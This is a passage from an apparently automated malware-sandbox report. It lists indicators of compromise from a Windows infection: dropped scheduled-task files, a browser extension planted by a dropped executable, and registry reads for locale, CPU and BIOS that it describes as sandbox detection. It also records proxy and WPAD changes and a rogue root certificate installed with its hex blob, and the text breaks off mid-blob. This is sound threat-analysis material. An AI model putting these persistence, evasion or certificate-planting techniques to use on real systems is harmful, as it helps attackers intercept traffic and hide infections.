File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	OlHGHzZ.exe

Drops file in Windows directory 10 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exedcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exesplwow64.exeschtasks.exeNework.exe

description	ioc	process
File created	C:\Windows\Tasks\unWjgiOqmrJvCJdsa.job	schtasks.exe
File created	C:\Windows\Tasks\MHiaqjbnoCNpItK.job	schtasks.exe
File created	C:\Windows\Tasks\kjGlTxIfJQSbObiUU.job	schtasks.exe
File created	C:\Windows\Tasks\axplong.job	dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exe
File opened for modification	C:\Windows\BrandonBlind	splwow64.exe
File created	C:\Windows\Tasks\bAqRDoFVIdSJfWxTlj.job	schtasks.exe
File opened for modification	C:\Windows\IpaqArthur	splwow64.exe
File created	C:\Windows\Tasks\Hkbsse.job	Nework.exe
File opened for modification	C:\Windows\HardlyAircraft	splwow64.exe
File opened for modification	C:\Windows\ViewpictureKingdom	splwow64.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

1760 348 WerFault.exe fIQqLZn.exe
2384 2304 WerFault.exe Install.exe
2420 3868 WerFault.exe OlHGHzZ.exe

pid	pid_target	process	target process
1760	348	WerFault.exe	fIQqLZn.exe
2384	2304	WerFault.exe	Install.exe
2420	3868	WerFault.exe	OlHGHzZ.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

explorer.exepowershell.execmd.exereg.exeforfiles.execmd.exeJavvvUmar.exeschtasks.exeschtasks.execmd.exeschtasks.execmd.exeschtasks.execmd.exereg.exeschtasks.exereg.exewscript.exereg.exerundll32.execmd.exesvchost015.exee0e4b0e858.exeschtasks.execmd.exereg.exeforfiles.exeRegAsm.exefindstr.exereg.exereg.exereg.exetasklist.exepowershell.exepowershell.exeschtasks.exeforfiles.execmd.exedcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exereg.exereg.exereg.execmd.exereg.exereg.exeexplorer.execmd.execmd.exereg.exereg.exeforfiles.exereg.execmd.exeexplorer.exeInstall.exeforfiles.exereg.exeschtasks.exepowershell.exeforfiles.exeschtasks.exereg.exereg.exereg.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JavvvUmar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e0e4b0e858.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Checks processor information in registry 2 TTPs 28 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

stealc_default2.exefirefox.exefirefox.exefirefox.exefirefox.exeJavvvUmar.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	stealc_default2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	JavvvUmar.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	stealc_default2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	JavvvUmar.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

Processes:

Install.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

OlHGHzZ.exerundll32.exewscript.exepowershell.exefIQqLZn.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0A0377A8-FF70-4A7F-BEE6-0CA71D73BEB1}	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-41-74-3e-f5-6b\WpadDecision = "0"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0A0377A8-FF70-4A7F-BEE6-0CA71D73BEB1}\WpadDecision = "0"	OlHGHzZ.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-41-74-3e-f5-6b\WpadDecisionReason = "1"	OlHGHzZ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0A0377A8-FF70-4A7F-BEE6-0CA71D73BEB1}\f6-41-74-3e-f5-6b	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	OlHGHzZ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	OlHGHzZ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0A0377A8-FF70-4A7F-BEE6-0CA71D73BEB1}\WpadNetworkName = "Network 3"	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	OlHGHzZ.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f01a1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-41-74-3e-f5-6b	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	fIQqLZn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	OlHGHzZ.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	OlHGHzZ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	OlHGHzZ.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	OlHGHzZ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-41-74-3e-f5-6b\WpadDecisionReason = "1"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0A0377A8-FF70-4A7F-BEE6-0CA71D73BEB1}\WpadDecisionTime = 00dbd6dae50adb01	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	OlHGHzZ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-41-74-3e-f5-6b\WpadDetectedUrl	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-41-74-3e-f5-6b	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	OlHGHzZ.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	fIQqLZn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	OlHGHzZ.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	OlHGHzZ.exe

Modifies registry class 4 IoCs

Processes:

firefox.exefirefox.exefirefox.exefirefox.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_Classes\Local Settings	firefox.exe

Modifies system certificate store 2 TTPs 11 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

Processes:

T3USPjGDkV.exeqvipgc.exeujqwfi.exeRegAsm.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	T3USPjGDkV.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 140000000100000014000000f352eacf816860c1097c4b852f4332dd93eb5d4f0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c20000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	T3USPjGDkV.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	qvipgc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	ujqwfi.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6